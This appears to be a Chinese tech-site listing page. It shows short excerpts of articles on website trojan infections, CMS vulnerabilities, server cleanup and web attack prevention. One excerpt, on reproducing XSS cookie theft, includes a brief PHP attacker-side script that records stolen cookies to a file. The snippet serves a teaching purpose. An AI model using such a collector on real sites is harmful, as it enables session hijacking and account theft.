造成服务器带宽跑满的原因有很多,大致可以归结为以下几类: 病毒 Windows 系统服务器中病毒或站点挂马,导致服务器内部有对外发包的文件。 建议在服务器上安装杀毒软件,进行杀毒。可以通过任务管理器中查看是否异常进程。当前阿里云暂时没有提供杀毒软件,您可以登陆服务器根据自己的日常使用的杀毒软件进行安 ...
分类:
其他好文 时间:
2017-06-04 11:40:04
阅读次数:
163
最近发现织梦cms被挂马现象频繁,解决好好几个网站的问题,但是过不了多久,就又被攻击了,即使更改系统及ftp密码,也没有起到防御的作用,最后怀疑cms本身漏洞,于是采用工具扫描了一下,才发现问题的严重性,在这里发一下解决办法,也希望采用织梦cms的童鞋,尽快升级补丁。 1.修复:[高危]DedeCM ...
分类:
其他好文 时间:
2017-05-05 10:51:34
阅读次数:
233
一.问题的来源有时候copy一些重要的数据,得到之后需要与原数据进行核对是否数据一致。这就需要进行校验。二.问题的分析校验数据有多种方法,最简单的是使用文件的md5码进行校验。但是文件很多,手动的每个文件进行md5校验显然不合适,这就需要编写shell程序解决。三.问题的解..
分类:
系统相关 时间:
2017-04-20 17:36:33
阅读次数:
280
摘要:对Web服务器的攻击也可以说是形形色色、种类繁多,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。本文结合WEB TOP10漏洞中常见的SQL注入,跨站脚本攻击(XSS),跨站请求伪造(CSRF)攻击的产生原理,介绍相应的防范方法。关键字:SQL注入 ...
分类:
数据库 时间:
2017-04-10 14:37:18
阅读次数:
309
一、跨站获取cookie1,hacker端(hacker.php)的程序如下:<?php$cookie=$_GET[‘cookie‘];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序如下:<html><head><title>xss跨站原理复现</title&..
分类:
其他好文 时间:
2017-03-10 11:18:31
阅读次数:
250
织梦DedeCMS是一款非常流行的CMS,很多刚开始建站人都用的织梦,一方面是织梦比较容易操作;另一方面是织梦的SEO方面做的确实比其他的系统要好一些。这些都导致织梦的用户群是非常庞大的,用的人多了,漏洞自然就多起来,所以织梦的安全性为大家所诟病,很多人在使用中经常会遇到或者担心网站挂马。这里No牛 ...
分类:
其他好文 时间:
2016-12-30 11:48:39
阅读次数:
225
wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性。所以我们在日常维护自己的网站时,一定要注重网站的安全性,最大限度的防止网站被挂上木马。 一般来说,破解网站的途径是获取网 ...
分类:
Web程序 时间:
2016-12-20 17:56:37
阅读次数:
225
今天朋友说他一台要准备上线的生产服务器被挂马,特征ps命令找不到进程,top能看到负载最高的一个程序是一个随机的10位字母的东西,kill掉之后自动再次出现一个随机10位字母的进程。 我让他关闭这个机器的外网,内网放开,在局域网中给我一个跳板。等我拿到权限之后进入机器,先按照朋友说的验证了一遍,果然 ...
分类:
系统相关 时间:
2016-12-13 12:03:23
阅读次数:
625
0x00事件背景某天,应用管理员过来告知一件事情,服务器上出现了很多奇怪的日志。有访问taobao、qzone、163等各种各样的记录,可能是被挂马了。就此对这个事件进行了一些调查和学习。0x01正向代理和正常访问的日志对比搭建了一个环境,使用Apache作为WebServer,开始对浏览器设..
分类:
Web程序 时间:
2016-11-11 15:43:46
阅读次数:
319
网页挂马是攻击者惯用的入侵手段,其影响极其恶劣。不仅让站点管理者蒙羞,而且殃及池鱼使站点的浏览者遭殃。不管是站点维护者还是个人用户,掌握、了解一定的网页挂马及其防御技术是非常必要的。 1、关于网页挂马 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这 ...
分类:
其他好文 时间:
2016-10-23 19:58:57
阅读次数:
187
